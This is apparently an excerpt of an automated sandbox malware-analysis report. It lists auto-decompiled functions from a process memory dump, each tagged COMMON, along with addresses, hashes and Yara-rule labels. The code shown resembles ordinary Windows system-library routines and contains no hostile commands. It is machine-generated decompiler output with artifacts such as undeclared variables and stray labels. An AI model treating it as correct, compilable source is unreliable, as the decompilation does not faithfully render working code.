Uniqueness

Uniqueness Score: -1.00%

Function 04CEE363 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CEE363(intOrPtr __ecx, void* __edx) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t50;
				intOrPtr* _t53;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr _t78;
				intOrPtr* _t95;
				intOrPtr* _t96;
				void* _t97;
				void* _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				intOrPtr _t112;
				void* _t113;

				_v24 = _v24 | 0xffffffff;
				_t112 = __ecx;
				_v28 = 0xffd23940;
				_v12 = __ecx;
				while(1) {
					_t50 =  *0x4da41d4; // 0x0
					if( *((intOrPtr*)(_t50 + 4 +  *(_t112 + 0x14) * 8)) <= 1) {
						break;
					}
					_push( &_v28);
					_push(0);
					E04CF2CF0();
				}
				if(( *(_t112 + 0xd4) & 0x04000000) != 0) {
					E04D83336(_t112);
				}
				_t53 = _t112 + 0x130;
				if( *_t53 != 0) {
					_push(0x8000);
					_v8 = 0;
					_push( &_v8);
					_push(_t53);
					_push(0xffffffff);
					E04CF2B90();
				}
				_push( *((intOrPtr*)(_t112 + 0x64)));
				E04CF2A80();
				_push( *((intOrPtr*)(_t112 + 0x60)));
				E04CF2A80();
				E04CAFBD0(0, _t109, _t112, _t112 + 0x48);
				if( *((intOrPtr*)(_t112 + 0x70)) != 0) {
					E04CC3B90(_t112 + 0x6c);
				}
				if( *((intOrPtr*)(_t112 + 0x78)) != 0) {
					E04CC3B90(_t112 + 0x74);
				}
				if( *((intOrPtr*)(_t112 + 0x80)) != 0) {
					E04CC3B90(_t112 + 0x7c);
				}
				_t95 = _t112 + 0x14c;
				_t110 =  *_t95;
				while(_t110 != _t95) {
					_t110 =  *_t110;
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t110);
				}
				_t62 = _t112 + 0x154;
				_t111 =  *_t62;
				if(_t111 != _t62) {
					do {
						_t63 = _t111 + 0xc;
						_v16 = _t111;
						_t96 =  *_t63;
						if(_t96 != _t63) {
							_t113 = _t111 + 0xc;
							do {
								_t96 =  *_t96;
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t96);
							} while (_t96 != _t113);
							_t112 = _v12;
						}
						_t97 = 0;
						_t111 =  *_t111;
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
					} while (_t111 != _t112 + 0x154);
				} else {
					_t97 = 0;
				}
				_t67 =  *((intOrPtr*)(_t112 + 0x164));
				if( *((intOrPtr*)(_t112 + 0x164)) != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t67);
				}
				_t70 =  *((intOrPtr*)(_t112 + 0x168));
				if( *((intOrPtr*)(_t112 + 0x168)) != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t70);
				}
				_t73 =  *((intOrPtr*)(_t112 + 0x170));
				if( *((intOrPtr*)(_t112 + 0x170)) != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t73);
				}
				_t76 =  *((intOrPtr*)(_t112 + 0x178));
				if( *((intOrPtr*)(_t112 + 0x178)) != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t76);
				}
				E04CEE4BC(_t112);
				_t78 =  *0x4da41d4; // 0x0
				 *((intOrPtr*)(_t78 +  *(_t112 + 0x14) * 8)) = 1;
				asm("lock dec dword [eax+ecx*8+0x4]");
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t112);
			}

0x04cee36b
0x04cee371
0x04cee373
0x04cee37b
0x04cee380
0x04cee383
0x04cee38f
0x00000000
0x00000000
0x04cee394
0x04cee395
0x04cee396
0x04cee396
0x04cee3a7
0x04d28faa
0x04d28faa
0x04cee3ad
0x04cee3b5
0x04cee3b7
0x04cee3bf
0x04cee3c2
0x04cee3c3
0x04cee3c4
0x04cee3c6
0x04cee3c6
0x04cee3cb
0x04cee3ce
0x04cee3d3
0x04cee3d6
0x04cee3df
0x04cee3e7
0x04cee3ed
0x04cee3ed
0x04cee3f5
0x04cee3fb
0x04cee3fb
0x04cee406
0x04d28fb8
0x04d28fb8
0x04cee40c
0x04cee412
0x04cee429
0x04cee41d
0x04cee424
0x04cee424
0x04cee42d
0x04cee433
0x04cee437
0x04d28fc2
0x04d28fc2
0x04d28fc5
0x04d28fc8
0x04d28fcc
0x04d28fce
0x04d28fd1
0x04d28fd8
0x04d28fdf
0x04d28fe4
0x04d28fe8
0x04d28fe8
0x04d28ff4
0x04d28ff6
0x04d28ffc
0x04d29007
0x04cee43d
0x04cee43d
0x04cee43d
0x04cee43f
0x04cee447
0x04d2901b
0x04d2901b
0x04cee44d
0x04cee455
0x04d29030
0x04d29030
0x04cee45b
0x04cee463
0x04d29045
0x04d29045
0x04cee469
0x04cee471
0x04cee47e
0x04cee47e
0x04cee485
0x04cee48d
0x04cee498
0x04cee4a2
0x04cee4bb

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59212012af88745b2fad72d3df9e31eb05bb61512d1c487c06cc82840e57eb24
Instruction ID: f65df2ae51d99958c5705cf4757cb64432062ce0d88afac60a57eb2f740182d4
Opcode Fuzzy Hash: 59212012af88745b2fad72d3df9e31eb05bb61512d1c487c06cc82840e57eb24
Instruction Fuzzy Hash: 55517E71600A44DFDB21EFA5D990EAAB3FAFF04748F00446AE65693260D735FD41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CDAD20 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E04CDAD20(intOrPtr _a4, signed int** _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t51;
				signed int _t59;
				unsigned int _t64;
				unsigned int _t75;
				signed int _t76;
				void* _t81;
				signed int* _t82;
				signed int _t85;
				signed int _t86;
				intOrPtr _t88;
				signed int _t89;
				signed int _t91;
				signed int* _t93;
				void* _t108;

				_t85 = _a12;
				_v12 = _v12 & 0x00000000;
				if((_t85 & 0xfffffff8) != 0 || (_t85 & 0x00000005 & (_t85 & 0x00000005) - 0x00000001) != 0) {
					L26:
					return 0xc00000f1;
				} else {
					_t41 = _t85 & 0x00000002;
					_v20 = _t41;
					_t91 = _t85 & 1;
					if(_t41 != 0) {
						__eflags = _t91;
						if(_t91 != 0) {
							goto L3;
						}
						goto L26;
					}
					L3:
					_t88 = _a4;
					if(_t88 != 0) {
						_t86 = _t85 & 0x00000004;
						__eflags = _t86;
						if(_t86 == 0) {
							L6:
							if(_t86 != 0) {
								L19:
								_t81 = 4;
								_t82 = E04CDB9FA(_t81);
								__eflags = _t82;
								if(_t82 == 0) {
									return 0xc000009a;
								}
								 *_t82 =  *_t82 & 0x00000000;
								 *_a8 = _t82;
								L17:
								return 0;
							}
							if(_t88 != 0) {
								_v8 = _v8 & 0x00000000;
								_v16 = _t91 ^ 1;
								_t75 = E04CDBA17(_t88, _t91 ^ 1);
								while(1) {
									L9:
									_t84 = _t75;
									_t93 = E04CDB9FA(_t75);
									if(_t93 == 0) {
										break;
									}
									if(_v8 != 1) {
										L13:
										if(_v16 != 1) {
											__eflags = _v20;
											_push(_t75 >> 1);
											_push(_t88);
											_push(0);
											_push(_t75);
											_push(_t93);
											if(__eflags != 0) {
												_t51 = E04CAAD10(_t75, _t88, __eflags);
											} else {
												_t51 = E04CE1E80(_t75, _t88, _t93);
											}
											_t89 = _t51;
											__eflags = _t89;
											if(_t89 >= 0) {
												L16:
												 *_a8 = _t93;
												goto L17;
											} else {
												E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
												L35:
												return _t89;
											}
										}
										E04CF88C0(_t93, _t88, _t75);
										if(_v8 == 1) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E04CBE740(_t84);
										}
										goto L16;
									}
									_t84 =  *[fs:0x30];
									E04CBFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_t59 = _v12;
									_t88 =  *((intOrPtr*)(_t59 + 0x48));
									if(_t88 == 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E04CBE740(_t84);
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										goto L19;
									}
									_t64 =  *(_t59 + 0x290);
									_t108 = _t64 - _t75;
									_t75 = _t64;
									if(_t108 > 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E04CBE740(_t84);
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										continue;
									}
									goto L13;
								}
								_t89 = 0xc000009a;
								goto L35;
							}
							_v16 = 1;
							_v8 = 1;
							_t76 =  *( *[fs:0x30] + 0x10);
							_v12 = _t76;
							E04CBFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t88 =  *((intOrPtr*)(_t76 + 0x48));
							_t75 =  *(_t76 + 0x290);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							E04CBE740(1);
							if(_t88 == 0) {
								goto L19;
							}
							goto L9;
						}
						L22:
						return 0xc0000030;
					}
					if(_t91 != 0) {
						goto L22;
					}
					_t86 = _t85 & 0x00000004;
					goto L6;
				}
			}

0x04cdad28
0x04cdad2b
0x04cdad38
0x04d1e184
0x00000000
0x04cdad4e
0x04cdad53
0x04cdad58
0x04cdad5b
0x04cdad5f
0x04d1e17c
0x04d1e17e
0x00000000
0x00000000
0x00000000
0x04d1e17e
0x04cdad65
0x04cdad65
0x04cdad6a
0x04cdae59
0x04cdae59
0x04cdae5c
0x04cdad7b
0x04cdad7d
0x04cdae41
0x04cdae43
0x04cdae49
0x04cdae4b
0x04cdae4d
0x00000000
0x04cdae82
0x04cdae52
0x04cdae55
0x04cdae38
0x00000000
0x04cdae38
0x04cdad85
0x04cdae69
0x04cdae71
0x04cdae7b
0x04cdadc6
0x04cdadc6
0x04cdadc6
0x04cdadcd
0x04cdadd1
0x00000000
0x00000000
0x04cdaddb
0x04cdae0a
0x04cdae0e
0x04d1e1da
0x04d1e1de
0x04d1e1df
0x04d1e1e0
0x04d1e1e2
0x04d1e1e3
0x04d1e1e4
0x04d1e1ed
0x04d1e1e6
0x04d1e1e6
0x04d1e1e6
0x04d1e1f2
0x04d1e1f4
0x04d1e1f6
0x04cdae33
0x04cdae36
0x00000000
0x04d1e1fc
0x04d1e208
0x04d1e214
0x00000000
0x04d1e214
0x04d1e1f6
0x04cdae17
0x04cdae23
0x04cdae2b
0x04cdae2e
0x04cdae2e
0x00000000
0x04cdae23
0x04cdaddd
0x04cdade7
0x04cdadec
0x04cdadef
0x04cdadf4
0x04d1e1b8
0x04d1e1bb
0x04d1e1cc
0x00000000
0x04d1e1cc
0x04cdadfa
0x04cdae00
0x04cdae02
0x04cdae04
0x04d1e194
0x04d1e197
0x04d1e1a8
0x00000000
0x04d1e1a8
0x00000000
0x04cdae04
0x04d1e20f
0x00000000
0x04d1e20f
0x04cdad91
0x04cdad94
0x04cdad97
0x04cdada0
0x04cdada6
0x04cdadb1
0x04cdadb4
0x04cdadba
0x04cdadbd
0x04cdadc4
0x00000000
0x00000000
0x00000000
0x04cdadc4
0x04cdae62
0x00000000
0x04cdae62
0x04cdad72
0x00000000
0x00000000
0x04cdad78
0x00000000
0x04cdad78

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7b5c73542af51f878e5a8304ab281d0fc80105660688ef2567bc9ac9d0b6a4
Instruction ID: e6af5ad1240ed4fa5d2d667033edcf44f76864d11a8988bdb45ee84b17c2d2cd
Opcode Fuzzy Hash: fa7b5c73542af51f878e5a8304ab281d0fc80105660688ef2567bc9ac9d0b6a4
Instruction Fuzzy Hash: 6551F132A40640EFDB26AF19C850F6A73B7FB44B58F194428EE029B760D636FD40D780

Uniqueness

Uniqueness Score: -1.00%

Function 04CD44D1 Relevance: .2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04CD44D1(char __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v5;
				char _v6;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t84;
				signed short _t87;
				void* _t88;
				void* _t92;
				signed int _t94;
				void* _t105;
				char _t107;

				_v6 = __ecx;
				_v12 = 0;
				_t107 = 0;
				_v36 = 0;
				_t105 = __edx;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if(_a4 == 0) {
					L25:
					_t56 = 0xc000000d;
				} else {
					_t57 = _a8;
					if(_t57 == 0 ||  *_t57 == 0 || __edx == 0) {
						goto L25;
					} else {
						_t84 = E04CC5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x1fe);
						if(_t84 == 0) {
							_t56 = 0xc0000017;
						} else {
							_t10 = _t84 + 0xaa; // 0xaa
							_v44 = 0xaa0000;
							_v40 = _t10;
							if(E04CD5DC0( &_v16, _t105) < 0 || E04CD4F40(_v16 & 0x0000ffff,  &_v44) == 0) {
								_t107 = 0xc0000001;
							} else {
								_t68 = _a4;
								_t87 = 0;
								_v20 = _v20 & 0;
								if(0 <  *(_a4 + 4)) {
									_v16 = 0;
									while(1) {
										_v32 = _t84;
										_v36 = 0xaa0000;
										_t88 = _t105;
										_t107 = E04CD4443(_t88,  *((intOrPtr*)(_t68 + 0x10)) + _t87,  &_v36);
										if(_t107 < 0) {
											goto L19;
										}
										_push(_t88);
										_t107 = E04CD5497(_a8, _t105, 0,  &_v12, _v32);
										if(_t107 >= 0) {
											if(_v6 == 0) {
												if(E04CF79A0(_v32, _v40) == 0) {
													goto L12;
												} else {
													goto L18;
												}
												L26:
											} else {
												L12:
												_t30 = _t84 + 0x154; // 0x154
												_v24 = _t30;
												_t92 = _t105;
												_v5 = 0;
												_v28 = 0xaa0000;
												_t107 = E04CD4693(_t92, _v32,  &_v28,  &_v5);
												if(_t107 >= 0) {
													while(_v28 > 0 && _v5 == 0) {
														_push(_t92);
														_t107 = E04CD5497(_a8, _t105, 0,  &_v12, _v24);
														if(_t107 >= 0) {
															_t92 = _t105;
															_t107 = E04CD4693(_t92, _v24,  &_v28,  &_v5);
															if(_t107 >= 0) {
																continue;
															} else {
																break;
															}
														}
														goto L19;
													}
													if(_t107 >= 0) {
														L18:
														_v16 = _v16 + 6;
														_t94 = _v20 + 1;
														_v20 = _t94;
														_t68 = _a4;
														_t87 = _v16;
														if(_t94 < ( *(_a4 + 4) & 0x0000ffff)) {
															continue;
														}
													}
												}
											}
										}
										goto L19;
									}
								}
							}
							L19:
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
							_t56 = _t107;
						}
					}
				}
				return _t56;
				goto L26;
			}

0x04cd44dd
0x04cd44e2
0x04cd44e6
0x04cd44e8
0x04cd44ec
0x04cd44ee
0x04cd44f1
0x04cd44f4
0x04cd44fa
0x04d1b4ea
0x04d1b4ea
0x04cd4500
0x04cd4500
0x04cd4505
0x00000000
0x04cd451b
0x04cd4530
0x04cd4534
0x04d1b4d6
0x04cd453a
0x04cd453a
0x04cd4540
0x04cd4547
0x04cd4556
0x04d1b4e0
0x04cd4572
0x04cd4572
0x04cd4575
0x04cd4577
0x04cd457e
0x04cd4584
0x04cd4587
0x04cd458a
0x04cd4593
0x04cd459a
0x04cd45a1
0x04cd45a5
0x00000000
0x00000000
0x04cd45ab
0x04cd45bf
0x04cd45c3
0x04cd45cd
0x04cd468b
0x00000000
0x04cd4691
0x00000000
0x04cd4691
0x00000000
0x04cd45d3
0x04cd45d3
0x04cd45d6
0x04cd45dc
0x04cd45df
0x04cd45e4
0x04cd45ec
0x04cd45f9
0x04cd45fd
0x04cd45ff
0x04cd460c
0x04cd4620
0x04cd4624
0x04cd4630
0x04cd4638
0x04cd463c
0x00000000
0x00000000
0x00000000
0x00000000
0x04cd463c
0x00000000
0x04cd4624
0x04cd4640
0x04cd4642
0x04cd4648
0x04cd464c
0x04cd464d
0x04cd4656
0x04cd4659
0x04cd465c
0x00000000
0x00000000
0x04cd465c
0x04cd4640
0x04cd45fd
0x04cd45cd
0x00000000
0x04cd45c3
0x04cd4587
0x04cd457e
0x04cd4662
0x04cd466e
0x04cd4673
0x04cd4673
0x04cd4534
0x04cd4505
0x04cd4679
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction ID: 87d4e1d0f1885973f654710212ae290a55cc04e0e47fe4cd9e70a7cfd078d27f
Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction Fuzzy Hash: B3519671E00219AFDF19DF94C850BEEBBB6AF44714F04806AEB01AB250DB74F945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04D3E660 Relevance: .2, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E04D3E660(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v8;
				signed int _v12;
				char _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				signed int* _v36;
				char _v40;
				void* _t44;
				void* _t47;
				void* _t53;
				void* _t57;
				signed int _t60;
				void* _t66;
				signed int* _t67;
				void* _t68;
				signed int* _t76;
				signed int* _t77;
				void* _t78;
				void* _t79;
				signed int* _t80;

				_v12 = _v12 | 0xffffffff;
				_t67 = 0;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				if(_a12 == 1) {
					_push(_a4);
					_push(0x8000000);
					_push(2);
					_push(0);
					_push(0);
					_push(0xf0005);
					_push( &_v12);
					_t44 = E04CF2E50();
					if(_v12 == 0xffffffff || _t44 < 0) {
						_t78 = 0xc0000008;
						goto L27;
					} else {
						_push(2);
						_push(0);
						_push(1);
						_v40 = 0;
						_push( &_v24);
						_v36 = 0;
						_push( &_v40);
						_push(0);
						_push(0);
						_v24 = 0;
						_push( &_v8);
						_push(0xffffffff);
						_push(_v12);
						_t53 = E04CF2C30();
						_push(_v12);
						_t79 = _t53;
						E04CF2A80();
						_t70 = _v8;
						if(_v8 == 0 || _t79 < 0) {
							_t78 = 0xc0000019;
							goto L27;
						} else {
							_t57 = E04CBE4B0(_t70, 0, 1,  &_v32,  &_v20);
							if(_t57 >= 0) {
								_t77 = _v20;
								L11:
								_t68 = E04CBB920(_t70, _v8);
								if(_t77 == 0) {
									L21:
									_t78 = E04D3E542(_v16, _a8);
									L22:
									_t67 = 0;
									L27:
									E04D3E4F2(_v16);
									if(_v8 != 0) {
										_push(_v8);
										_push(0xffffffff);
										_t47 = E04CF2C50();
										if(_t47 < 0 && _t47 == 0xc0000045 && E04D5E670(_v8, _t67) != 0) {
											_push(_v8);
											_push(0xffffffff);
											E04CF2C50();
										}
									}
									return _t78;
								}
								while( *((intOrPtr*)(_t77 + 0xc)) != 0 &&  *((intOrPtr*)(_t77 + 0x10)) != 0) {
									_t60 = E04CB9630(_t68, _v8,  *((intOrPtr*)(_t77 + 0xc)));
									_v28 = _t60;
									if(_t60 == 0) {
										_t78 = 0xc000008b;
										goto L22;
									}
									_t80 = E04CC5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc);
									if(_t80 == 0) {
										_t78 = 0xc0000017;
										goto L22;
									}
									_t80[2] = _t80[2] & 0x00000000;
									 *_t80 =  *_t80 & 0x00000000;
									_t80[1] = _v28;
									E04D3E5FE(_t80,  &_v16);
									_t76 = _v8;
									_t70 = _t80;
									_push(_t77);
									_push(_t68);
									if( *((intOrPtr*)(_t68 + 0x18)) != 0x10b) {
										_t66 = E04D3E461(_t70, _t76);
									} else {
										_t66 = E04D3E3DD(_t70, _t76);
									}
									_t78 = _t66;
									if(_t78 < 0) {
										goto L22;
									} else {
										_t77 = _t77 + 0x14;
										if(_t77 != 0) {
											continue;
										}
										goto L21;
									}
								}
								goto L21;
							}
							if(_t57 != 0xc0000002) {
								_t78 = 0xc0000089;
								goto L27;
							}
							_t77 = 0;
							goto L11;
						}
					}
				}
				_t78 = 0xc0000058;
				goto L27;
			}

0x04d3e668
0x04d3e66d
0x04d3e675
0x04d3e678
0x04d3e67b
0x04d3e67e
0x04d3e68a
0x04d3e690
0x04d3e695
0x04d3e697
0x04d3e698
0x04d3e699
0x04d3e69e
0x04d3e69f
0x04d3e6a8
0x04d3e7d1
0x00000000
0x04d3e6b6
0x04d3e6b6
0x04d3e6b8
0x04d3e6b9
0x04d3e6be
0x04d3e6c1
0x04d3e6c5
0x04d3e6c8
0x04d3e6c9
0x04d3e6ca
0x04d3e6ce
0x04d3e6d1
0x04d3e6d2
0x04d3e6d4
0x04d3e6d7
0x04d3e6dc
0x04d3e6df
0x04d3e6e1
0x04d3e6e6
0x04d3e6eb
0x04d3e7ca
0x00000000
0x04d3e6f9
0x04d3e705
0x04d3e70c
0x04d3e723
0x04d3e726
0x04d3e72e
0x04d3e732
0x04d3e7ab
0x04d3e7b6
0x04d3e7b8
0x04d3e7b8
0x04d3e7d6
0x04d3e7d9
0x04d3e7e2
0x04d3e7e4
0x04d3e7e7
0x04d3e7e9
0x04d3e7f0
0x04d3e806
0x04d3e809
0x04d3e80b
0x04d3e80b
0x04d3e7f0
0x04d3e816
0x04d3e816
0x04d3e734
0x04d3e747
0x04d3e74c
0x04d3e751
0x04d3e7c3
0x00000000
0x04d3e7c3
0x04d3e765
0x04d3e769
0x04d3e7bc
0x00000000
0x04d3e7bc
0x04d3e771
0x04d3e777
0x04d3e77a
0x04d3e77d
0x04d3e782
0x04d3e78a
0x04d3e78c
0x04d3e78d
0x04d3e792
0x04d3e79b
0x04d3e794
0x04d3e794
0x04d3e794
0x04d3e7a0
0x04d3e7a4
0x00000000
0x04d3e7a6
0x04d3e7a6
0x04d3e7a9
0x00000000
0x00000000
0x00000000
0x04d3e7a9
0x04d3e7a4
0x00000000
0x04d3e734
0x04d3e713
0x04d3e719
0x00000000
0x04d3e719
0x04d3e715
0x00000000
0x04d3e715
0x04d3e6eb
0x04d3e6a8
0x04d3e680
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction ID: 9382b2a5554a546f730ceb58bde53622db585cf881ae20876690441066556477
Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction Fuzzy Hash: E951C471E00219EFEF219E90CC84BAEB779BB0072AF114665D511A72D0E775FE40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D7CDEB Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04D7CDEB(signed int* __ecx, signed int __edx, char _a4, intOrPtr _a8, signed char _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				void* __ebx;
				signed int _t62;
				signed int _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				void* _t77;
				char* _t81;
				signed int _t85;
				void* _t98;
				intOrPtr _t102;
				void* _t108;
				signed int _t111;
				signed int _t116;
				void* _t123;
				intOrPtr _t126;
				signed int _t129;
				char _t132;

				_t126 = _a8;
				_t132 = _a4;
				_t62 = 2;
				_v32 = _t62;
				_v36 = __edx;
				_v44 = __ecx;
				_v8 = _a12 >> 0x00000016 & _t62;
				asm("sbb eax, eax");
				_v12 = (__ecx[2] & 0) + 0x1ff;
				_t116 = __edx - ( *__ecx & __edx) >> 4 << __ecx[1];
				_v16 = _t116;
				if(_t126 <= 0) {
					_t98 = _t132 - _t126;
				} else {
					_v32 = _v32 & 0x00000000;
					_t98 = _t126 + _t132;
				}
				_t102 = 0;
				while(1) {
					_v20 = _t102;
					if(_t132 >= _t98) {
						break;
					}
					_t129 = _v12 - (_t132 + _t116 & _v12) + 1;
					_t72 = _t98 - _t132;
					if(_t129 >= _t72) {
						_t129 = _t72;
					}
					_a4 = _t132;
					_v40 = _t129;
					_t75 = E04D7D065(_v44, _v36,  &_a4,  &_v40, _v32);
					_v60 = _t75;
					if(_t75 == 0) {
						L23:
						_t132 = _t132 + _t129;
						_t116 = _v16;
						_t102 = _v20 + _t75;
						continue;
					}
					_t119 =  *_v44 & _v36;
					_v24 =  *_v44 & _v36;
					_v28 = _a4 + _v16;
					if(_t75 > 0) {
						_t108 = 0x1000;
						if((_a12 & 0x00000002) != 0) {
							_t108 = 0x40001000;
						}
					} else {
						_t108 = 0x4000;
					}
					_t77 = E04D7C0E6(_v44, _t119, _v28, _v40, _t75, _t108, _v8);
					if(_t77 < 0) {
						L28:
						return _t77;
					} else {
						_t78 = _v48;
						if(_v48 > 0) {
							E04D7D065(_v44, _v36,  &_a4,  &_v40, 1);
							_t78 = _v60;
						}
						E04D7DC08(_v44, _v36, _t78);
						if(E04CC3C40() == 0) {
							_t81 = 0x7ffe0380;
						} else {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t81 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_t123 = (_v28 << 0xc) + _v24;
							_t111 = _v44[9];
							_t85 = _v40 << 0xc;
							if(_v48 <= 0) {
								E04D6F13E(_t98, _t111, _t123, _t85, 0xd);
							} else {
								E04D6EFD3(_t98, _t111, _t123, _t85, 0xa);
							}
						}
						_t75 = _v48;
						goto L23;
					}
				}
				_t76 = _a16;
				if(_t76 != 0) {
					 *_t76 = _t102;
				}
				_t77 = 0;
				goto L28;
			}

0x04d7cdfc
0x04d7cdff
0x04d7ce07
0x04d7ce0a
0x04d7ce13
0x04d7ce19
0x04d7ce1d
0x04d7ce21
0x04d7ce2d
0x04d7ce3d
0x04d7ce3f
0x04d7ce45
0x04d7ce53
0x04d7ce47
0x04d7ce47
0x04d7ce4c
0x04d7ce4c
0x04d7ce55
0x04d7cf9a
0x04d7cf9a
0x04d7cfa0
0x00000000
0x00000000
0x04d7ce6b
0x04d7ce6c
0x04d7ce70
0x04d7ce72
0x04d7ce72
0x04d7ce88
0x04d7ce8c
0x04d7ce90
0x04d7ce95
0x04d7ce9b
0x04d7cf8e
0x04d7cf92
0x04d7cf94
0x04d7cf98
0x00000000
0x04d7cf98
0x04d7ceaa
0x04d7ceb2
0x04d7ceb6
0x04d7cebc
0x04d7cec9
0x04d7cece
0x04d7ced0
0x04d7ced0
0x04d7cebe
0x04d7cebe
0x04d7cebe
0x04d7cee7
0x04d7ceee
0x04d7cfb1
0x04d7cfb7
0x04d7cef4
0x04d7cef4
0x04d7cefa
0x04d7cf0f
0x04d7cf14
0x04d7cf14
0x04d7cf21
0x04d7cf2d
0x04d7cf3f
0x04d7cf2f
0x04d7cf38
0x04d7cf38
0x04d7cf47
0x04d7cf63
0x04d7cf67
0x04d7cf6e
0x04d7cf76
0x04d7cf85
0x04d7cf78
0x04d7cf7b
0x04d7cf7b
0x04d7cf76
0x04d7cf8a
0x00000000
0x04d7cf8a
0x04d7ceee
0x04d7cfa6
0x04d7cfab
0x04d7cfad
0x04d7cfad
0x04d7cfaf
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
